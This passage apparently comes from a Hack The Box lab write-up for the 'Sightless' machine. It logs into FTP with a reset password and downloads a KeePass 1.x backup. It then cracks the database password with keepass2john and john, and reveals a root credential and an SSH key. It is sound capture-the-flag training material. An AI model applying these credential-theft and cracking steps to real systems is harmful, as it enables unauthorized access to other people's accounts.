FTP
I have reset the password of the web1
account for the FTP server on the Froxlor admin panel
┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ lftp -u web1 $IP
Password: Qwer1234
lftp web1@10.129.242.165:~>
Successfully authenticated to the FTP server
lftp web1@10.129.242.165:~> ls
ls: Fatal error: Certificate verification: The certificate is NOT trusted. The certificate issuer is unknown. (A1:4B:95:93:0A:CF:15:CD:DD:52:68:ED:DB:5B:92:ED:F0:F3:3C:69)
lftp web1@10.129.242.165:~> set ssl:verify-certificate off
Disabling the SSL verification
index.html
lftp web1@10.129.242.165:~> ls
drwxr-xr-x 3 web1 web1 4096 May 17 03:17 goaccess
-rw-r--r-- 1 web1 web1 8376 Mar 29 10:29 index.html
goaccess
lftp web1@10.129.242.165:/> get index.html
8376 bytes transferred
Downloaded the index.html
file
KeePass DB
lftp web1@10.129.242.165:/> cd goaccess
lftp web1@10.129.242.165:/goaccess> ls
drwxr-xr-x 2 web1 web1 4096 Aug 2 07:14 backup
goaccess/backup
lftp web1@10.129.242.165:/goaccess> cd backup
lftp web1@10.129.242.165:/goaccess/backup> ls
-rw-r--r-- 1 web1 web1 5292 Aug 6 14:29 Database.kdb
There is a KeePass DB file; Database.kdb
lftp web1@10.129.242.165:/goaccess/backup> get Database.kdb
5292 bytes transferred
Downloaded to Kali
┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ file Database.kdb
Database.kdb: Keepass password database 1.x KDB, 8 groups, 4 entries, 600000 key transformation rounds
It is indeed a KeePass DB file, but a very old version. 1.x
┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ keepassxc Database.kdb
It’s password-protected
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ keepass2john Database.kdb > Database.kdb.hash
Inlining Database.kdb
Turning the DB file into a crack-able hash string
┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ john Database.kdb.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 1 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldogs (Database.kdb)
1g 0:00:00:22 DONE (2024-09-08 13:29) 0.04490g/s 47.41p/s 47.41c/s 47.41C/s bullshit..stars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
john cracked the password hash
The cracked DB password is bulldogs
Unlocked
Importing (Unlocking)
Unlocked.
There is a single entry
It appears to be the credential of the
root
account
root
:q6gnLTB74L132TMdFCpK
There is also an attachment;
id_rsa
I will save that into the current directory
Moving on to the Privilege Escalation phase